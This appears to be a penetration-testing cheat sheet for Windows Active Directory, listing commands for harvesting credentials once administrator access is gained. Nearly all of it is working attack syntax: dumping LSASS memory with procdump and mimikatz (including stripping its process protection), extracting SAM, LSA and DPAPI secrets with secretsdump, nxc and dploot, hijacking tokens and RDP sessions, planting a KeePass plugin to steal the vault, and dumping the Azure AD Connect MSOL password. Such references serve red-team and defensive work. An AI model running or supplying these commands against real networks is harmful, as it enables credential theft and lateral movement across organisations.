Admin Access
Extract credentials from LSASS.exe
- LSASS as protected process
PPLdump64.exe <lsass.exe|lsass_pid> lsass.dmp #before 2022-07-22 updatemimikatz "!+" "!processprotect /process:lsass.exe /remove" "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "!processprotect /process:lsass.exe" "!-"
-
Extract LSASS secrets *User + Pass NTLM PassTheHash Clear text move*{: .highlight} procdump.exe -accepteula -ma lsass.exe lsass.dmpmimikatz "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "exit"msf> load kiwi creds_allnxc smb <ip_range> -u <user> -p <password> -M lsassylsassy -d <domain> -u <user> -p <password> <ip>
Extract credentials from SAM NTLM || PassTheHash
nxc smb <ip_range> -u <user> -p <password> --sammsf> hashdumpmimikatz "privilege::debug" "lsadump::sam" "exit"secretsdump.py <domain>/<user>:<password>@<ip>reg save HKLM\SAM <file>; reg save HKLM\SYSTEM <file>secretsdump.py -system SYSTEM -sam SAM LOCAL
reg.py <domain>/<user>:<password>@<ip> backup -o '\\<smb_ip>\share'secretsdump.py -system SYSTEM -sam SAM LOCAL
regsecrets.py <domain>/<user>:<password>@<ip>
Extract credentials from LSA MsCache 2 || User + Pass
nxc smb <ip_range> -u <user> -p <password> --lsamimikatz "privilege::debug" "lsadump::lsa" "exit"reg save HKLM\SECURITY <file>; reg save HKLM\SYSTEM <file>secretsdump.py -system SYSTEM -security SECURITY
reg.py <domain>/<user>:<password>@<ip> backup -o '\\<smb_ip>\share'
Extract credentials from DPAPI
-
DPAPI *User + Pass PassTheHash Clear text move*{: .highlight} nxc smb <ip_range> -u <user> -p <password> --dpapi [cookies] [nosystem]donpapi <domain>/<user>:<password>@<target>dpapidump.py <domain>/<user>:<password>@<target>- get masterkey
mimikatz "sekurlsa::dpapi"dploot.py browser -d <domain> -u <user> -p '<password>' <ip> -mkfile <masterkeys_file>
lsassy -d <domain> -u <user> -p <password> <ip> -m rdrleakdiag -M masterkeysdploot.py browser -d <domain> -u <user> -p '<password>' <ip> -mkfile <masterkeys_file>
SharpDPAPI.exe triage
- Crack users masterkey DPAPImk
- copy c:\users<user>\AppData\Roaming\Microsoft\Protect<SID>
DPAPImk2john.py --preferred <prefered_file>DPAPImk2john.py -c domain -mk <masterkey> -S <sid>
- copy c:\users<user>\AppData\Roaming\Microsoft\Protect<SID>
Impersonate
-
Impersonate *ACL User + Pass*{: .highlight} msf> use incognito impersonate_token <domain>\\<user>nxc smb <ip> -u <localAdmin> -p <password> --loggedon-usersnxc smb <ip> -u <localAdmin> -p <password> -M schtask_as -o USER=<logged-on-user> CMD=<cmd-command>
irs.exe listirs.exe exec -p <pid> -c <command>
-
Impersonate with adcs *NTLM Pass The Hash / Ticket / Certificate*{: .highlight} masky - d <domain> -u <user> (-p <password> || -k || -H <hash>) -ca <certificate authority> <ip>
- Impersonate RDP Session RDP
psexec.exe -s -i cmdquery usertscon.exe <id> /dest:<session_name>
Misc
- Find Users Username
smbmap.py --host-file ./computers.list -u <user> -p <password> -d <domain> -r 'C$\Users' --dir-only --no-write-check --no-update --no-color --csv users_directory.csv
- Extract Keepass User + Pass
KeePwn.py plugin add -u '<user>' -p '<password>' -d '<domain>' -t <target> --plugin KeeFarceRebornPlugin.dllKeePwn.py trigger add -u '<user>' -p '<password>' -d '<domain>' -t <target>
- Hybrid (Azure AD-Connect) DCSYNC
- Dump cleartext password of MSOL Account on ADConnect Server
azuread_decrypt_msol_v2.ps1nxc smb <ip> -u <user> -p <password> -M msol
- Dump cleartext password of MSOL Account on ADConnect Server